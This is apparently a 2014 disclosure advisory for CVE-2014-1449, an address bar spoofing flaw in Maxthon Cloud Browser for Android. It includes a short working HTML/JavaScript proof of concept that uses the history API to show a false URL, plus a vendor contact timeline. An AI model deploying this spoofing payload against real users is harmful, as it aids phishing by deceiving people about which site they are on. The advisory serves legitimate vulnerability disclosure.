Monday, March 10, 2014

[CVE-2014-1449] Maxthon Cloud Browser for Android 4.1.4.2000 Address Bar Spoofing

# Vulnerability: Maxthon Cloud Browser for Android Address Bar Spoofing
# Date: 10.01.2014
# Software Link: https://play.google.com/store/apps/details?id=com.mx.browser
# Vulnerable version: 4.1.4.2000
# Tested on: Android 4.4
# CVE: CVE-2014-1449
# Author: Pawel Wylecial
# http://h0wl.pl

1. Background

Description from the vendor website: "Maxthon Cloud Browser for Android is the first multi-tab browser with Maxthon’s innovative Cloud Services, including: Cloud Tabs, Cloud Push, Cloud Download and bookmarks/favorites syncing. With its cool design and out of the box features like Super Gestures, Reader Mode, App Center and more, this browser delivers a fresh and original browsing experience."

2. Vulnerability

Maxthon for Android is vulnerable to Address Bar Spoofing. Using the history API it was possible to spoof the URL shown in the address bar, which could trick the user into believing he is visiting a different site than the one actually loaded.

3. Proof of Concept

<html>
<script>
function trigger() {
        w = window.open("http://howl.overflow.pl");
        w.location = "http://h0wl.pl";
        setTimeout('w.location = "a.html"', 1000);
        setTimeout('w.history.back();', 2000);
        setTimeout('w.history.forward();', 2100);
}
</script>
<a href="javascript:trigger();">click</a>
</html>


PoC in action: http://howl.overflow.pl/maxthon1.mp4


4. Fix

No response from the vendor. A silent fix was applied in 4.1.5.2000 or 4.1.6.2000 (the exact version could not be confirmed here, since the test device was updated straight to 4.1.6.2000).

5. Timeline

10.01.2014 - vulnerability reported
15.01.2014 - second e-mail
21.01.2014 - third
22.01.2014 - *silent fix applied (?), http://www.maxthon.com/android/changelog/
29.01.2014 - last try

10.03.2014 - advisory published